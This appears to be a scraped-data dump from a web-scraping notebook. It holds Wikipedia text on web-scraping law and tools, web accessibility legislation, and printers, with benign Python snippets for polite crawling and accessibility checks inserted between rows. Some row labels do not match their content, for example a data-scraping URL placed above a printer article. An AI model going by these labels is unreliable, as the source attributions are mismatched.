Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc. in the United States District Court for the Eastern District of Virginia, the court ruled that the terms of use should be brought to the users' attention in order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleged that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. During the period of this trial, the terms-of-use link on the plaintiff's website was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned it to the Ninth Circuit to reconsider in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
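The list of anti-bot techniques is truncated in this extract, but the flip side for a scraper is easy to illustrate: check robots.txt and pace requests so that such measures are less likely to be triggered. This is a hedged sketch using only the standard library plus requests; the target URL, user agent string, crawl paths, and delay are arbitrary assumptions, not recommendations from the source text.
# Politeness sketch: honor robots.txt and rate-limit requests
# (the URL, user agent, paths, and delay below are illustrative assumptions)
import time
import requests
from urllib import robotparser
from urllib.parse import urljoin

base_url = "https://example.com"
user_agent = "example-research-bot"

rp = robotparser.RobotFileParser()
rp.set_url(urljoin(base_url, "/robots.txt"))
rp.read()

for path in ["/", "/about"]:
    page_url = urljoin(base_url, path)
    if rp.can_fetch(user_agent, page_url):       # skip anything robots.txt disallows
        response = requests.get(page_url, headers={"User-Agent": user_agent}, timeout=10)
        print(page_url, response.status_code)
    time.sleep(2)                                # simple delay between requests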
302 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_accessibility | Web accessibility, or eAccessibility, 1 is the inclusive practice of ensuring there are no barriers that prevent interaction with, or access to, websites on the World Wide Web by people with physical disabilities, situational disabilities, and socio-economic restrictions on bandwidth and speed. When sites are correctly designed, developed and edited, more users have equal access to information and functionality. For example, when a site is coded with semantically meaningful HTML, with textual equivalents provided for images and with links named meaningfully, this helps blind users using text-to-speech software and or text-to-Braille hardware. When text and images are large and or enlargeable, it is easier for users with poor sight to read and understand the content. When links are underlined (or otherwise differentiated) as well as colored, this ensures that color blind users will be able to notice them. When clickable links and areas are large, this helps users who cannot control a mouse with precision. When pages are not coded in a way that hinders navigation by means of the keyboard alone, or a single switch access device alone, this helps users who cannot use a mouse or even a standard keyboard. When videos are closed captioned, chaptered, or a sign language version is available, deaf and hard-of-hearing users can understand the video. When flashing effects are avoided or made optional, users prone to seizures caused by these effects are not put at risk. And when content is written in plain language and illustrated with instructional diagrams and animations, users with dyslexia and learning difficulties are better able to understand the content. When sites are correctly built and maintained, all of these users can be accommodated without decreasing the usability of the site for non-disabled users. The needs that web accessibility aims to address include: Accessibility is not confined to the list above, rather it extends to anyone who is experiencing any permanent, temporary or situational disability. Situational disability refers to someone who may be experiencing a boundary based on the current experience. For example, a person may be situationally one-handed if they are carrying a baby. Web accessibility should be mindful of users experiencing a wide variety of barriers. According to a 2018 WebAIM global survey of web accessibility practitioners, close to 93% of survey respondents received no formal schooling on web accessibility. 3 Individuals living with a disability use assistive technologies such as the following to enable and assist web browsing: In 1999 the Web Accessibility Initiative, a project by the World Wide Web Consortium (W3C), published the Web Content Accessibility Guidelines WCAG 1.0. On 11 December 2008, the WAI released the WCAG 2.0 as a Recommendation. WCAG 2.0 aims to be up to date and more technology neutral. Though web designers can choose either standard to follow, the WCAG 2.0 have been widely accepted as the definitive guidelines on how to create accessible websites. Governments are steadily adopting the WCAG 2.0 as the accessibility standard for their own websites. 4 In 2012, the Web Content Accessibility Guidelines were also published as an ISO IEC standard: "ISO IEC 40500:2012: Information technology W3C Web Content Accessibility Guidelines (WCAG) 2.0". 5 In 2018, the WAI released the WCAG 2.1 Recommendation that extends WCAG 2.0. 
6 There has been some criticism of the W3C process, claiming that it does not sufficiently put the user at the heart of the process. 7 There was a formal objection to WCAG's original claim that WCAG 2.0 will address requirements for people with learning disabilities and cognitive limitations headed by Lisa Seeman and signed by 40 organizations and people. 8 In articles such as "WCAG 2.0: The new W3C guidelines evaluated", 9 "To Hell with WCAG 2.0" 10 and "Testability Costs Too Much", 11 the WAI has been criticised for allowing WCAG 1.0 to get increasingly out of step with today's technologies and techniques for creating and consuming web content, for the slow pace of development of WCAG 2.0, for making the new guidelines difficult to navigate and understand, and other argued failings. The accessibility of websites relies on the cooperation of several components: 12 Web developers usually use authoring tools and evaluation tools to create web content. People ("users") use web browsers, media players, assistive technologies or other "user agents" to get and interact with the content. 12 Because of the growth in internet usage 18 and its growing importance in everyday life, countries around the world are addressing digital access issues through legislation. One approach is to protect access to websites for people with disabilities by using existing human or civil rights legislation. Some countries, like the U.S., protect access for people with disabilities through the technology procurement process. 19 It is common for nations to support and adopt the Web Content Accessibility Guidelines (WCAG) 2.0 by referring to the guidelines in their legislation. 20 21 Compliance with web accessibility guidelines is a legal requirement primarily in North America, Europe, parts of South America and parts of Asia. 22 Argentina Law 26.653 on Accessibility to Information on Web Pages. 23 Approved by the National Congress of Argentina on November 3, 2010. It specifies in its Article 1 that both the National State and its decentralized organisms or those companies that are related in any way with public services or goods, must respect the rules and requirements on accessibility in the design of their web pages. The objective is to facilitate access to contents to all persons with disabilities, in order to guarantee equal opportunities in relation to access to information and to avoid discrimination. In addition, by Decree 656 2019 24 the regulation of the aforementioned Law No. 26,653 is approved and it is reported that the authority in charge of its application will be the ONTI, "Oficina Nacional de Tecnolog as de Informaci n" (National Office of Information Technologies). 25 This agency is in charge of assisting and or advising the individuals and legal entities reached by this Law; in addition to disseminating, approving updating and also controlling the fulfillment of the accessibility standards and requirements of the web pages; among other functions. In 2000, an Australian blind man won a $20,000 court case against the Sydney Organising Committee of the Olympic Games (SOCOG). 26 This was the first successful case under Disability Discrimination Act 1992 because SOCOG had failed to make their official website, Sydney Olympic Games, adequately accessible to blind users. The Human Rights and Equal Opportunity Commission (HREOC) also published World Wide Web Access: Disability Discrimination Act Advisory Notes. 
27 All Governments in Australia also have policies and guidelines that require accessible public websites. In Brazil, the federal government published a paper with guidelines for accessibility on 18 January 2005, for public reviewing. On 14 December of the same year, the second version was published, including suggestions made to the first version of the paper. On 7 May 2007, the accessibility guidelines of the paper became compulsory to all federal websites. The current version of the paper, which follows the WCAG 2.0 guidelines, is named e-MAG, Modelo de Acessibilidade de Governo Eletr nico (Electronic Government Accessibility Model), and is maintained by Brazilian Ministry of Planning, Budget, and Management. The paper can be viewed and downloaded at its official website. 28 In 2011, the Government of Canada began phasing in the implementation of a new set of web standards that are aimed at ensuring government websites are accessible, usable, interoperable and optimized for mobile devices. These standards replace Common Look and Feel 2.0 (CLF 2.0) Standards for the Internet. The first of these four standards, Standard on Web Accessibility 29 came into full effect on 31 July 2013. The Standard on Web Accessibility follows the Web Content Accessibility Guidelines (WCAG) 2.0 AA, and contains a list of exclusions that is updated annually. It is accompanied by an explicit Assessment Methodology 30 that helps government departments comply. The government also developed the Web Experience Toolkit (WET), 31 a set of reusable web components for building innovative websites. The WET helps government departments build innovative websites that are accessible, usable and interoperable and therefore comply with the government's standards. The WET toolkit is open source and available for anyone to use. The three related web standards are: the Standard on Optimizing Websites and Applications for Mobile Devices, 32 the Standard on Web Usability 33 and the Standard on Web Interoperability. 34 In 2019 the Government of Canada passed the Accessible Canada Act. This builds on the on provincial legislation like the Accessibility for Ontarians with Disabilities Act, The Accessibility for Manitobans Act and the Nova Scotia Accessibility Act. In February 2014 a draft law was endorsed by the European Parliament stating that all websites managed by public sector bodies have to be made accessible to everyone. 35 A European Commission Communication on eAccessibility was published on 13 September 2005. 1 The commission's aim to "harmonise and facilitate the public procurement of accessible ICT products and services" was embedded in a mandate issued to CEN, CENELEC and ETSI in December 2005, reference M 376. 36 A mandate is a request for the drafting and adoption of a European standard or European standardisation deliverables issued to one or more of the European standardisation organisations. Mandates are usually accepted by the standardisation organisation because they are based on preliminary consultation, although technically the organisation is independent and has a right to decline the mandate. 37 The mandate also called for the development of an electronic toolkit for public procurers enabling them to have access to the resulting harmonised requirements. 38 The commission also noted that the harmonised outcome, while intended for public procurement purposes, might also be useful for procurement in the private sector. 
38 : Section 2.3 On 26 October 2016, the European Parliament approved the Web Accessibility Directive, which requires that the websites and mobile apps of public sector bodies be accessible. The relevant accessibility requirements are described in the European standard EN 301 549 V3.2.1 (published by ETSI). EU member states were expected to bring into force by 23 September 2018 laws and regulations that enforce the relevant accessibility requirements. Some categories of websites and apps are excepted from the directive, for example "websites and mobile applications of public service broadcasters and their subsidiaries". 39 The European Commission's "Rolling Plan for ICT Standardisation 2017" notes that ETSI standard EN 301 549 V1.1.2 will need to be updated to add accessibility requirements for mobile applications and evaluation methodologies to test compliance with the standard. 40 In 2019 the European Union introduced the European Accessibility Act, as one of the leading pieces of legislation for digital accessibility and digital inclusion. The European Accessibility Act (EAA), which will enter into force on 28 June 2025, requiring companies to ensure that the newly marketed products and services covered by the Act are accessible. All websites will need to meet a minimum AA-level criterion. As of June 28, 2025, customers will be able to file complaints before national courts or authorities if services or products do not respect the new rules. 41 In India, National Informatics Centre (NIC), under Ministry of Electronics and Information Technology (MeitY) has passed Guidelines for Indian Government Websites (GIGW) 42 for government agencies in 2009, compelling them to adhere to WCAG 2.0 Level A standards. 43 Ministry of Electronics and Information Technology (MeitY) has National Policy on Universal Electronic Accessibility 44 clearly stated, Accessibility Standards and Guidelines be formulated or adapted from prevailing standards in the domain including World Wide Web Consortium accessibility Web standards and guidelines such as Authoring Tool Accessibility Guidelines (ATAG 45 ), Web Content Accessibility Guidelines (WCAG 2.0) and User Agent Accessibility Guidelines (UAAG 46 ). GIGW aims to ensure the quality and accessibility of government guidelines by offering guidance on desirable practices covering the entire lifecycle of websites, web portals and web applications, right from conceptualization and design to their development, maintenance and management. The Department of Administrative Reforms and Public Grievances made the same a part of the Central Secretariat Manual of Office Procedure. GIGW 3.0 47 also significantly enhances the guidance on the accessibility and usability of mobile apps, especially by offering specific guidance to government organizations on how to leverage public digital infrastructure devised for whole-of-government delivery of services, benefits and information. 48 The Rights of Persons with Disabilities Act, 2016 (RPwD) 49 passed in parliament. The law replaced earlier legislation and provided clearer guidance for digital accessibility. The RPwD Act, 106 through Sections 40 46 mandates accessibility to be ensured in all public-centric buildings, transportation systems, Information and Communication Technology (ICT) services, consumer products and all other services being provided by the Government or other service providers. 
50 In Ireland, the Disability Act 2005 51 requires that where a public body communicates in electronic form with one or more persons, the contents of the communication must be, as far as practicable, "accessible to persons with a visual impairment to whom adaptive technology is available" (Section 28(2)). The National Disability Authority has produced a Code of Practice 52 giving guidance to public bodies on how to meet the obligations of the Act. This is an approved code of practice and its provisions have the force of legally binding statutory obligations. It states that a public body can achieve compliance with Section 28(2) by "reviewing existing practices for electronic communications in terms of accessibility against relevant guidelines and standards", giving the example of "Double A conformance with the Web Accessibility Initiative's (WAI) Web Content Accessibility Guidelines (WCAG) . The Israeli Ministry of Justice recently published regulations requiring Internet websites to comply with Israeli standard 5568, which is based on the W3C Web Content Accessibility Guidelines 2.0. The main differences between the Israeli standard and the W3C standard concern the requirements to provide captions and texts for audio and video media. The Israeli standards are somewhat more lenient, reflecting the current technical difficulties in providing such captions and texts in Hebrew. 53 In Italy, web accessibility is ruled by the so-called "Legge Stanca" (Stanca Act), formally Act n.4 of 9 January 2004, officially published on the Gazzetta Ufficiale on 17 January 2004. The original Stanca Act was based on the WCAG 1.0. On 20 March 2013 the standards required by the Stanca Act were updated to the WCAG 2.0. Web Content Accessibility Guidelines in Japan were established in 2004 as JIS (Japanese Industrial Standards) X 8341 3. JIS X 8341 3 was revised in 2010 as JIS X 8341 3:2010 to encompass WCAG 2.0, and it was revised in 2016 as JIS X 8341 3:2016 to be identical standards with the international standard ISO IEC 40500:2012. The Japanese organization WAIC (Web Accessibility Infrastructure Committee) has published the history and structure of JIS X 8341 3:2016. 54 In Malta Web Content Accessibility assessments were carried out by the Foundation for Information Technology Accessibility (FITA) since 2003. 55 Until 2018, this was done in conformance with the requirements of the Equal Opportunities Act (2000) CAP 43 and applied WACG guidelines. 56 With the advent of the EU Web Accessibility Directive the Malta Communications Authority was charged with ensuring the accessibility of online resources owned by Maltese public entities. 57 FITA continues to provide ICT accessibility assessments to public and commercial entities, applying standard EN301549 and WCAG 2.1 as applicable. Therefore, both the Equal Opportunities Act anti-discrimination legislation and the transposed EU Web Accessibility Directive are applicable to the Maltese scenario. In Norway, web accessibility is a legal obligation under the Act 20 June 2008 No 42 relating to a prohibition against discrimination on the basis of disability, also known as the Anti-discrimination Accessibility Act. 
The Act went into force in 2009, and the Ministry of Government Administration, Reform and Church Affairs Fornyings , administrasjons- og kirkedepartementet published the Regulations for universal design of information and communication technology (ICT) solutions Forskrift om universell utforming av informasjons- og kommunikasjonsteknologiske (IKT) l sninger in 2013. 58 The regulations require compliance with Web Content Accessibility Guidelines 2.0 (WCAG 2.0) NS ISO IEC 40500: 2012, level A and AA with some exceptions. 59 60 The Norwegian Agency for Public Management and eGovernment (Difi) is responsible for overseeing that ICT solutions aimed at the general public are in compliance with the legislative and regulatory requirements. 61 As part of the Web Accessibility Initiatives in the Philippines, the government through the National Council for the Welfare of Disabled Persons (NCWDP) board approved the recommendation of forming an ad hoc or core group of webmasters that will help in the implementation of the Biwako Millennium Framework set by the UNESCAP. The Philippines was also the place where the Interregional Seminar and Regional Demonstration Workshop on Accessible Information and Communications Technologies (ICT) to Persons with Disabilities was held where eleven countries from Asia Pacific were represented. The Manila Accessible Information and Communications Technologies Design Recommendations was drafted and adopted in 2003. In Spain, UNE 139803:2012 is the norm entrusted to regulate web accessibility. This standard is based on Web Content Accessibility Guidelines 2.0. 62 In Sweden, Verva, the Swedish Administrative Development Agency is responsible for a set of guidelines for Swedish public sector web sites. Through the guidelines, web accessibility is presented as an integral part of the overall development process and not as a separate issue. The Swedish guidelines contain criteria which cover the entire life cycle of a website; from its conception to the publication of live web content. These criteria address several areas which should be considered, including: An English translation was released in April 2008: Swedish National Guidelines for Public Sector Websites. 63 The translation is based on the latest version of Guidelines which was released in 2006. 64 In the UK, the Equality Act 2010 does not refer explicitly to website accessibility, but makes it illegal to discriminate against people with disabilities. The Act applies to anyone providing a service; public, private and voluntary sectors. The Code of Practice: Rights of Access Goods, Facilities, Services and Premises document 65 published by the government's Equality and Human Rights Commission to accompany the Act does refer explicitly to websites as one of the "services to the public" which should be considered covered by the Act. In December 2010 the UK released the standard BS 8878:2010 Web accessibility. Code of practice. This standard effectively supersedes PAS 78 (pub. 2006). PAS 78, produced by the Disability Rights Commission and usable by disabled people. The standard has been designed to introduce non-technical professionals to improved accessibility, usability and user experience for disabled and older people. 66 It will be especially beneficial to anyone new to this subject as it gives guidance on process, rather than on technical and design issues. 
BS 8878 is consistent with the Equality Act 2010 67 and is referenced in the UK government's e-Accessibility Action Plan as the basis of updated advice on developing accessible online services. It includes recommendations for: BS 8878 is intended for anyone responsible for the policies covering web product creation within their organization, and governance against those policies. It additionally assists people responsible for promoting and supporting equality and inclusion initiatives within organizations and people involved in the procurement, creation or training of web products and content. A summary of BS 8878 68 is available to help organisations better understand how the standard can help them embed accessibility and inclusive design in their business-as-usual processes. On 28 May 2019, BS 8878 was superseded by ISO 30071 1, the international Standard that built on BS 8878 and expanded it for international use. A summary of how ISO 30071 1 relates to BS 8878 69 is available to help organisations understand the new Standard. On April 9, National Rail replaced its blue and white aesthetic with a black and white theme, which was criticized for not conforming to the Web Content Accessibility Guidelines. The company restored the blue and white theme and said it is investing in modernising its website in accords to the latest accessibility guidelines. 70 In 2019 new accessibility regulations 71 72 came into force setting a legal duty for public sector bodies to publish accessibility statements and make their websites accessible by 23 September 2020 73 Accessibility statements include information about how the website was tested and the organisation's plan to fix any accessibility problems. Statements should be published and linked to on every page on the website. 74 In the United States, Section 508 Amendment to the Rehabilitation Act of 1973 requires all Federal agencies' electronic and information technology to be accessible to those with disabilities. Both members of the public and federal employees have the right to access this technology, such as computer hardware and software, websites, phone systems, and copiers. 75 Also, Section 504 of the Rehabilitation Act prohibits discrimination on the basis of disability for entities receiving federal funds and has been cited in multiple lawsuits against organizations such as hospitals that receive federal funds through medicare medicaid. In addition, Title III of the Americans with Disabilities Act (ADA) prohibits discrimination on the basis of disability. There is some debate on the matter; multiple courts and the U.S. Department of Justice have taken the position that the ADA requires website and app operators and owners to take affirmative steps to make their websites and apps accessible to disabled persons and compatible with common assistive technologies such as the JAWS screen reader, while other courts have taken the position that the ADA does not apply online. The U.S. Department of Justice has endorsed the WCAG2.0AA standard as an appropriate standard for accessibility in multiple settlement agreements. 76 Numerous lawsuits challenging websites and mobile apps on the basis of the ADA have been filed since 2017. These cases appears spurred by a 2017 case, Gil v. Winn Dixie Stores, in which a federal court in Florida ruled that Winn Dixie's website must be accessible. Around 800 cases related to web accessibility were filed in 2017, and over 2,200 were filed in 2018. 
Additionally, though the Justice Department had stated in 2010 that it would publish guidelines for web accessibility, it reversed this plan in 2017, also spurring legal action against inaccessible sites. 77 A notable lawsuit related to the ADA was filed against Domino's Pizza by a blind user who could not use Domino's mobile app. At the federal district level, the court ruled in favor of Domino's because the Justice Department had not established guidelines for accessibility, but this was appealed to the Ninth Circuit. The Ninth Circuit overruled the district court, ruling that because Domino's is a brick-and-mortar store, which must meet the ADA, and the mobile app is an extension of its services, the app must also comply with the ADA. Domino's petitioned the Supreme Court, backed by many other restaurants and retail chains, arguing that this decision impacts their due process rights since disabled customers have other, more accessible means to order. 77 In October 2019, the Supreme Court declined to hear the case, which effectively upheld the decision of the Ninth Circuit and allowed the case to proceed as it stands. 78 79 The number and cost of federal accessibility lawsuits have risen dramatically in the last few years. 80 A growing number of organizations, companies and consultants offer website accessibility audits. These audits, a type of system testing, identify accessibility problems that exist within a website, and provide advice and guidance on the steps that need to be taken to correct these problems. A range of methods are used to audit websites for accessibility, and each of these methods has its strengths and weaknesses; ideally, a combination of methods should be used to assess the accessibility of a website. Once an accessibility audit has been conducted and accessibility errors have been identified, the errors need to be remediated in order to ensure the site complies with accessibility guidelines. The traditional way of correcting an inaccessible site is to go back into the source code, reprogram the error, and then test to make sure the bug was fixed. If the website is not scheduled to be revised in the near future, that error (and others) would remain on the site for a lengthy period of time, possibly violating accessibility guidelines. Because this is a complicated process, many website owners choose to build accessibility into a new site design or re-launch, as it can be more efficient to develop the site to comply with accessibility guidelines than to remediate errors later. With the progress of AI technology, web accessibility has become easier to achieve. With third-party add-ons that leverage AI and machine learning, it is possible to offer changes to the website design without altering the source code. This way, a website can be made accessible to different types of users without the need to adjust it for every kind of assistive technology. 82 For a web page to be accessible, all important semantics about the page's functionality must be available so that assistive technology can understand and process the content and adapt it for the user. However, as content becomes more and more complex, the standard HTML tags and attributes become inadequate for providing semantics reliably. Modern Web applications often apply scripts to elements to control their functionality and to enable them to act as a control or other dynamic component. These custom components or widgets do not provide a way to convey semantic information to the user agent.
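To make the audit discussion above concrete, here is a minimal sketch of one automated check, reusing the requests and BeautifulSoup stack already used in this notebook. It only flags img elements without a usable alt attribute (a common WCAG failure); the URL is a placeholder, empty alt text can be intentional for decorative images, and a real audit would combine many more checks with manual review.

from bs4 import BeautifulSoup
import requests

def find_images_missing_alt(url):
    # Fetch the page and flag <img> tags with a missing or empty alt attribute.
    html = requests.get(url, timeout=10).text
    soup = BeautifulSoup(html, "html5lib")
    problems = []
    for img in soup.find_all("img"):
        alt = img.get("alt")
        if alt is None or not alt.strip():
            problems.append(img.get("src", "<inline image>"))
    return problems

# Hypothetical usage:
# for src in find_images_missing_alt("https://example.com"):
#     print("Image with missing or empty alt text:", src)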
WAI-ARIA (Accessible Rich Internet Applications) is a specification 83 published by the World Wide Web Consortium that describes how to increase the accessibility of dynamic content and user interface components developed with Ajax, HTML, JavaScript and related technologies. ARIA enables accessibility by allowing the author to supply the semantics that fully describe a component's supported behaviour. It also allows each element to expose its current states and properties and its relationships to other elements. Accessibility problems with focus and tab index are also addressed. |
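As a rough illustration of the role, state and property attributes WAI-ARIA adds, the sketch below scans a small hand-written HTML fragment for role and aria-* attributes using BeautifulSoup; the markup is invented for the example and is not taken from any real page.

from bs4 import BeautifulSoup

sample_html = """
<div role="tablist">
  <button role="tab" aria-selected="true" aria-controls="panel-1">Overview</button>
  <button role="tab" aria-selected="false" aria-controls="panel-2">Details</button>
  <div id="panel-1" role="tabpanel">First panel content</div>
</div>
"""

soup = BeautifulSoup(sample_html, "html5lib")
for element in soup.find_all(True):  # True matches every tag
    # Collect the WAI-ARIA semantics the element exposes, if any.
    aria_attrs = {name: value for name, value in element.attrs.items()
                  if name == "role" or name.startswith("aria-")}
    if aria_attrs:
        print(element.name, aria_attrs)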
303 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Printer_(computing) | In computing, a printer is a peripheral machine which makes a durable representation of graphics or text, usually on paper. 1 While most output is human-readable, bar code printers are an example of an expanded use for printers. 2 Different types of printers include 3D printers, inkjet printers, laser printers, and thermal printers. 3 The first computer printer designed was a mechanically driven apparatus by Charles Babbage for his difference engine in the 19th century; however, his mechanical printer design was not built until 2000. 4 The first patented printing mechanism for applying a marking medium to a recording medium or more particularly an electrostatic inking apparatus and a method for electrostatically depositing ink on controlled areas of a receiving medium, was in 1962 by C. R. Winston, Teletype Corporation, using continuous inkjet printing. The ink was a red stamp-pad ink manufactured by Phillips Process Company of Rochester, NY under the name Clear Print. This patent (US3060429) led to the Teletype Inktronic Printer product delivered to customers in late 1966. 5 The first compact, lightweight digital printer was the EP 101, invented by Japanese company Epson and released in 1968, according to Epson. 6 7 8 The first commercial printers generally used mechanisms from electric typewriters and Teletype machines. The demand for higher speed led to the development of new systems specifically for computer use. In the 1980s there were daisy wheel systems similar to typewriters, line printers that produced similar output but at much higher speed, and dot-matrix systems that could mix text and graphics but produced relatively low-quality output. The plotter was used for those requiring high-quality line art like blueprints. The introduction of the low-cost laser printer in 1984, with the first HP LaserJet, 9 and the addition of PostScript in next year's Apple LaserWriter set off a revolution in printing known as desktop publishing. 10 Laser printers using PostScript mixed text and graphics, like dot-matrix printers, but at quality levels formerly available only from commercial typesetting systems. By 1990, most simple printing tasks like fliers and brochures were now created on personal computers and then laser printed; expensive offset printing systems were being dumped as scrap. The HP Deskjet of 1988 offered the same advantages as a laser printer in terms of flexibility, but produced somewhat lower-quality output (depending on the paper) from much less-expensive mechanisms. Inkjet systems rapidly displaced dot-matrix and daisy-wheel printers from the market. By the 2000s, high-quality printers of this sort had fallen under the $100 price point and became commonplace. The rapid improvement of internet email through the 1990s and into the 2000s has largely displaced the need for printing as a means of moving documents, and a wide variety of reliable storage systems means that a "physical backup" is of little benefit today. Starting around 2010, 3D printing became an area of intense interest, allowing the creation of physical objects with the same sort of effort as an early laser printer required to produce a brochure. As of the 2020s, 3D printing has become a widespread hobby due to the abundance of cheap 3D printer kits, with the most common process being Fused deposition modeling. 
